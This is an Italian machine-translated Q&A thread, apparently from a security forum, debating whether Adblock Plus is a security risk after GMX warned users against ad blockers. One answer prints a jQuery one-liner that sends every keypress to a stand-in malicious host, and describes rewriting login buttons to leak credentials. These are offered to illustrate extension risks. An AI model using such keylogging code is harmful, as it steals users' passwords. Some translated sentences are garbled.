it-swarm-eu.dev

Adblock (Plus) è un rischio per la sicurezza?

Sito web del mio provider di posta elettronica (http://www.gmx.de) ha recentemente iniziato a collegarsi al sito (tedesco) http://www.browsersicherheit.info/ che fondamentalmente afferma che a causa delle sue capacità di modificare l'aspetto di un sito, Adblock Plus (e altri) potrebbe essere effettivamente abusato per phishing. Ecco una citazione da quel sito più la sua traduzione:

Solche Add-ons ha aggiunto Zugriff su Ihre Eingaben nel browser e contiene un dritte weitergeben - auch Ihr Bank-Passwort. Muore Kann auf Allen Web-Seiten passieren. Sicherheitsmechanismen wie SSL können das nicht verhindern.

tradotto:

Tali componenti aggiuntivi possono accedere a tutti gli input del browser e possono anche inoltrarli a terze parti, persino la password bancaria. Questo può accadere su tutti i siti Web. Meccanismi di sicurezza come SSL non possono evitarlo.

Ok, menzionano altri componenti aggiuntivi (piuttosto ovviamente crapware), ma Adblock Plus è davvero una minaccia per la sicurezza o gli operatori di quel sito semplicemente sfruttano l'opportunità per provare a spaventare gli utenti inesperti a visualizzare nuovamente i loro annunci?

167
Tobias Kienzler

Non lo è. Questa è una campagna FUD ( paura, incertezza e dubbio ) di GMX perché vogliono mostrare il loro Annunci. Non vi è assolutamente alcun rischio per la sicurezza dai blocchi pubblicitari citati. Hanno aggiunto alcuni crapware all'elenco per renderlo più legittimo.

Naturalmente tali campagne sono molto insolite, soprattutto da una società così grande e ben nota come GMX. Sfortunatamente, non ho una fonte inglese a portata di mano (perché è solo una campagna tedesca) ma poiché parli tedesco potresti voler leggere questo articolo su heise.de .

Aggiornamento n. 1: United Internet, la società dietro GMX, ha ricevuto molte critiche per i clienti fuorvianti sostenendo erroneamente che esiste un rischio per la sicurezza del proprio PC. Il Wall Street Journal (edizione tedesca) ha denominato gli avvisi visualizzati su GMX e il sito che collegano a una "campagna di paura".

Aggiornamento n. 2: GMX ora dice che non visualizzeranno più il collegamento quando si utilizzano i blocchi degli annunci ma lo visualizzeranno comunque se si utilizza crapware che inietta annunci, l'elenco nel sito http://www.browsersicherheit.info/ è stato aggiornato di conseguenza e ora elenca solo una piccola raccolta di crapware. Questo elenco non è affatto completo, quindi non è una fonte affidabile quando vuoi sapere se il tuo browser ha installato crapware. Tuttavia, United Internet mantiene ancora la posizione secondo cui non desidera che gli utenti che visitano i loro siti utilizzino i blocchi di annunci e affermi che in futuro svilupperanno altri metodi anti-blocco ( fonte tedesca ).

224
Andalur

pdate

Dopo averci riflettuto, devo concordare con le altre risposte in merito, nonostante il fatto che PUO 'accedere ai tuoi dati, Adblock ha maggiori probabilità di proteggere la tua privacy piuttosto che invaderlo. I rischi reali sono dannosi annunci che ti richiedono di installare software sul tuo computer. Adblock impedisce questi.

Di seguito è la risposta originale e cautelativa:

Sì, lo è totalmente.

Adblock Plus è un'estensione/componente aggiuntivo del browser sviluppato da uno sviluppatore indipendente. Adblock può accedere al DOM (modello a oggetti del documento) su tutte le pagine.

Il modo in cui AdBlock funziona è che inietta lo script nel tuo browser, che cerca il DOM e quindi esegue una funzione hide() su ciò che determina sono gli annunci.

Ciò significa che AdBlock (e qualsiasi Chrome con tale autorizzazione) possono accedere al DOM. Adblock non può accedere alle variabili JavaScript.

Cosa significa questo?

Se ti trovi su un sito Web con autenticazione sicura e c'è un oggetto JavaScript con qualcosa di privato come un AuthKey, sei sicuro. AdBlock non può accedere alle variabili JavaScript.

Tuttavia, AdBlock PU run eseguire codice equivalente a questo.

$(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})

Che essenzialmente indirizzerà tutti i tasti premuti su un server remoto.

Questo può essere usato per rubare la tua password che è anche peggio che rubare il tuo token.

Detto questo, AdBlock stesso è pericoloso?

Mi sembra che AdBlock non sia eccessivamente pericoloso in quanto lo sviluppatore si è identificato ed è utilizzato da milioni di persone. Se stesse facendo il tipo di inganno come sopra, qualcuno avrebbe probabilmente notato e soffiato il fischio.

Ma non pensare Chrome Le estensioni sono totalmente sicure. Tutte possono rubare qualsiasi dato, così come altre cose dannose.

Che altro può fare?

A Chrome Extension può anche eseguire le seguenti violazioni della sicurezza in modo abbastanza banale ...

  • Instrada il contenuto di qualsiasi e-mail o pagina che leggi a una fonte di terze parti (se questa e-mail contiene informazioni di accesso non crittografate, verrai eliminato) Se riesci a vederlo sullo schermo, puoi anche Chrome = Estensione, senza fare domande.
  • Immettere le informazioni in un campo e premere il pulsante di invio, ad esempio inviare un messaggio di posta elettronica
  • Se lasci il browser aperto e l'estensione sa come, può utilizzare la tua interfaccia di posta elettronica (Gmail, Outlook) per inviare e-mail di sua scelta ai tuoi contatti. Questo è banale.
  • Modifica lo script associato a qualsiasi pulsante, se originariamente inserito in jQuery. Ad esempio, il pulsante che invia le informazioni di accesso al server può essere leggermente modificato per inviare tali informazioni sia al server sia a http://mymaliciousserver. Questo è banale.

Aggiornare

È stato verificato attraverso la discussione che AdBlock è open source. Questo dovrebbe farti fidare di più di AdBlock, ma ricorda che è ancora capace di fare quelle cose. Ho esaminato la fonte e posso tranquillamente dire che non ho idea di cosa stia succedendo.

Fonte: I am a JavaScript and Chrome Developer extension.

110
Code Whisperer

Questo si riduce davvero a un problema di fiducia. È vero che oggi l'estensione AdBlock è sicura. Sappiamo che non ruberà i tuoi dati, anche se - come sottolineato da altre risposte - ha la capacità tecnica di farlo.

Tuttavia, Chrome vengono silenziosamente e aggiornate automaticamente.

Credi che lo sviluppatore dell'estensione AdBlock non aggiungerà codice dannoso? Personalmente lo faccio - con milioni di utenti, il codice dannoso verrebbe notato rapidamente e senza dubbio sarebbe un killer di carriera per lo sviluppatore.

Anche se ti fidi dello sviluppatore, ci sono ancora scenari improbabili che potrebbero esporti:

Per i paranoici, questi problemi potrebbero essere mitigati da:

Quindi, mentre è intellettualmente disonesto dire "no, non c'è rischio", il rischio è completamente esagerato da GMX. Proprio come mi fido di Google per darmi un browser che non ruba i miei dati personali, mi fido dello sviluppatore AdBlock di darmi un'estensione che non ruba i miei dati.

Il rischio che l'estensione venga aggiornata con un codice dannoso è abbastanza piccolo da non preoccuparmene e, se avessi la minima preoccupazione, è abbastanza facile disabilitare l'estensione.

54
josh3736

Tutto il software rappresenta un rischio per la sicurezza, ma in questo caso il loro reclamo è fuorviante.

Proprio come tutti i consigli sono potenzialmente negativi e tutte le transazioni sono potenzialmente fraudolente. "Rischio" significa solo che la tua sicurezza non è garantita, è vero nel 100% dei casi.

Ma nel caso di AdBlock Plus, il software è ben compreso e sviluppato da un team che ha una storia di protezione degli interessi dei suoi utenti. Inoltre è open-source, quindi il codice sorgente è disponibile per poter esaminare se stessi per eventuali problemi di sicurezza. Quindi, in questo caso, il rischio è minimo; anche banale.

Invece, GMX sta usando una verità ("il software è sempre rischioso") per suggerire che il software questo è pericoloso, il che è fuorviante nella migliore delle ipotesi e forse diffamatorio. È come se un proprietario di un ristorante distribuisse volantini dicendo che i suoi concorrenti avrebbero potuto avvelenare il proprio cibo. Tecnicamente è vero, dal momento che hai detto "potrebbe essere" invece di " sono ", ma l'azione è fondamentalmente disonesta.

42
tylerl

Solo un'osservazione: tendo a promuovere i blocchi degli annunci soprattutto per i miei amici e collaboratori meno esperti, proprio perché riduce minacce alla sicurezza. Come? Perché gran parte dei contenuti più dannosi sul Web si presenta sotto forma di pubblicità fuorviante come "fai clic qui per rendere il tuo PC più veloce" ... Questi scompaiono in gran parte con un blocco degli annunci.

20
Wyrmwood

Adblock (come altre estensioni e, per quanto, gli sviluppatori di browser) ha la capacità tecnica di ottenere molti dei tuoi dati e hai tutti i rischi comunemente associati all'esecuzione di applicazioni di terze parti, vale a dire che il fornitore può essere dannoso, e potrebbero esserci dei bug nel loro software che violano la tua sicurezza.

Detto questo, considererei AdBlock come difesa contro il phishing. Un sacco di software discutibile viene spinto agli utenti attraverso annunci mascherati da qualcos'altro - ad esempio, un sito offre alcuni elementi che un utente desidera, ma ha un annuncio che assomiglia a un pulsante di download e offre alcuni prodotti adware/malware anziché i contenuti effettivi sul sito e tali malware scaricati "accidentalmente" rappresentano un grave rischio per la sicurezza. Allo stesso modo, ci sono stati episodi di attacchi di massa da parte dei consumatori eseguendo un banner pubblicitario contenente un exploit zeroday, che avrebbe fatto apparire l'exploit su siti rispettati e affidabili.

Per le pratiche di sicurezza a livello aziendale, può avere senso richiedere AdBlock e installarlo per impostazione predefinita su ogni workstation, poiché è particolarmente utile per proteggere gli utenti inesperti che non lo installerebbero da soli. Ciò comporterebbe un rischio fidandosi di un altro prodotto software, ma sarebbe un netto vantaggio per la sicurezza di tutti i giorni.

9
Peteris

Il modo in cui queste informazioni vengono diffuse da United Internet è fuorviante (sto cercando di evitare di dire "diffamazione"). L'accusa così com'è è chiaramente sbagliata sotto tutti gli aspetti oggettivi e la presentazione è diffamatoria.

Naturalmente, in linea di principio, si deve ammettere che Adblock (Plus) è ovviamente un rischio di sicurezza potenziale. Se questo rischio giustifica una preoccupazione ragionevole è un'altra cosa.

Adblock (Plus) potrebbe rappresenta un rischio per la sicurezza per tre motivi:

  1. È un software che gira sul tuo computer, che potrebbe, come tutto il software, in linea di principio fa quasi tutto. Compreso mostrare informazioni false o rubare i tuoi dati.
  2. fa modifica il contenuto della pagina web, questo è il blocco degli annunci. Certamente, un software che è ben noto per modificare il contenuto delle pagine Web potrebbe modificare il contenuto in modo dannoso e passare inosservato molto più facilmente di un altro software.
  3. Esegue questa attività abbinando un elenco scaricabile di espressioni regolari da una serie di terze parti (non controllate/sconosciute), come EasyList

Quindi, se sei in modalità ultra-paranoia, potresti temere che qualcuno su EasyList (o un altro fornitore di elenchi di filtri) modifichi l'elenco di filtri in modo che faccia qualcosa di dannoso, o un hacker dirotta il sito. Il tuo componente aggiuntivo Adblock Plus scaricherà presumibilmente l'elenco dannoso durante il suo aggiornamento giornaliero/settimanale senza sapere e senza un mezzo di verifica (esiste un checksum che può essere incorporato, ma protegge solo dalla corruzione accidentale, non da modifiche dannose).
Di conseguenza, un tale elenco di blocchi dannosi potrebbe in teoria fa sì che l'addon faccia "cose ​​cattive".

Fortunatamente, a parte gli exploit di JS, non c'è troppo danno che potrebbe realisticamente essere fatto attraverso questo vettore di attacco a causa del modo in cui Adblock funziona (corrisponderà a una regex arbitraria, ma vinto 't do sostituti arbitrari, quindi nascondere alcuni elementi che non dovrebbero nascondere o lasciare passare alcuni annunci è praticamente il caso peggiore possibile).
D'altra parte, un exploit JS potrebbe essere usato contro di te senza Adblock Plus in esecuzione in primo luogo.

Inoltre, ovviamente, come qualsiasi software di terze parti (incluso Firefox o Chrome stesso!) L'addon Adblock Plus stesso potrebbe rubare i tuoi dati. Tutto quello che puoi dire al momento il tempo è che finora non è successo.
Quindi, quasi tutti i grandi attori commerciali del settore stanno facendo cose inaffidabili su base giornaliera, a cui nessuno si oppone.

Ora devi chiederti quanto è probabile che Adblock Plus anzi rubi i dati degli utenti e quanto è probabile che una cosa del genere rimanga inosservata per più di un giorno o due in un ambiente ampiamente distribuito progetto open source.

Francamente, se ritieni che si tratti di una minaccia seria e realistica che potrebbe interessarti, allora devi anche credere che Microsoft in collaborazione con NSA già crea funzionalità di furto di identità direttamente in Windows e che ogni computer ha un "kill switch" segreto che il DoD americano può attivare a piacimento (anche questo è in linea di principio possibile, ed è effettivamente altro probabilmente essere vero rispetto all'autore di Adblock che ruba i tuoi risparmi).

Non dovresti fidarti di GMX neanche in questo caso, poiché saranno (prendi nota della formulazione, sarà, non potrebbe) condividono tutti i tuoi dati personali e informazioni sul traffico in modo maligno e non etico con altre parti (almeno con le agenzie statunitensi, a causa del trattato di Schröder del 2001, ma non hai modo di dirlo con chi altro).
Inoltre, non dovresti fidarti di 1 & 1 (un altro membro di United Internet) perché volontà condivideranno i tuoi dati personali con chissà chi (essendo una società con sede negli Stati Uniti). Né Google, né l'altra metà di Internet per quella materia.

D'altra parte, Adblock Plus ha dimostrato impedito malware di essere installato sui computer degli utenti in passato.

8
Damon

Le altre risposte dimenticano di menzionare il problema a parte la fiducia: quel blocco degli annunci sta modificando le pagine che visiti. Questo e doversi fidare di più sviluppatori è il motivo per cui non ho mai usato plug-in software/browser per il blocco degli annunci e lo consiglio vivamente.

È noto che i siti Web dipendono da tutti i tipi di fragili invarianti per la sicurezza. Ad esempio, basta guardare ai modi in cui il clickjacking è stato affrontato in passato. Non c'è nulla che impedisca ad adblock di violare erroneamente un invariante da cui il sito dipende per motivi di sicurezza.

Anche il blocco degli annunci e altri software di blocco degli annunci riducono l'anonimato. Un avversario può farti eseguire il codice per sfogliare l'albero del DOM e cercare parti/modifiche mancanti o osservare passivamente che non stai facendo determinate richieste per recuperare contenuti correlati agli annunci (alcuni dei quali potrebbero essere ospitati sul sito stesso, rendendolo un possibile avversario).

3
Longpoke

Qualcosa che nessuno ha menzionato qui è che Adblock plus insieme a quasi tutti gli altri browser ed estensioni può essere aggiornato in remoto. Ciò significa che deve esserci una backdoor nel programma anche se è bloccata su specifici URL di aggiornamento "affidabili". Questo potrebbe essere interpretato come spyware, ma spyware è un termine piuttosto astratto.

È vero che la maggior parte delle persone ha affermato che non è sicuro in quanto dispone delle autorizzazioni per leggere e inviare dati sebbene sia ampiamente riconosciuto che Adblock plus in particolare non sia dannoso. Nonostante la maggior parte sia open source (incluso Adblock), il software e le estensioni del browser sono sicuri solo come gli URL di aggiornamento per i quali non c'è modo di sapere quanto siano effettivamente sicuri poiché il codice per questi servizi è remoto e quindi non accessibile.

Ovviamente nessun software o server può essere sicuro al 100% a causa dell'entropia e dell'avere utenti, ma per ottenere la massima sicurezza possibile dovresti studiare il codice sorgente, creare sempre dal sorgente e disabilitare l'aggiornamento automatico. Come con tutti i software, i browser e le estensioni sono sicuri solo quanto l'utente li crea.

2
tpbapp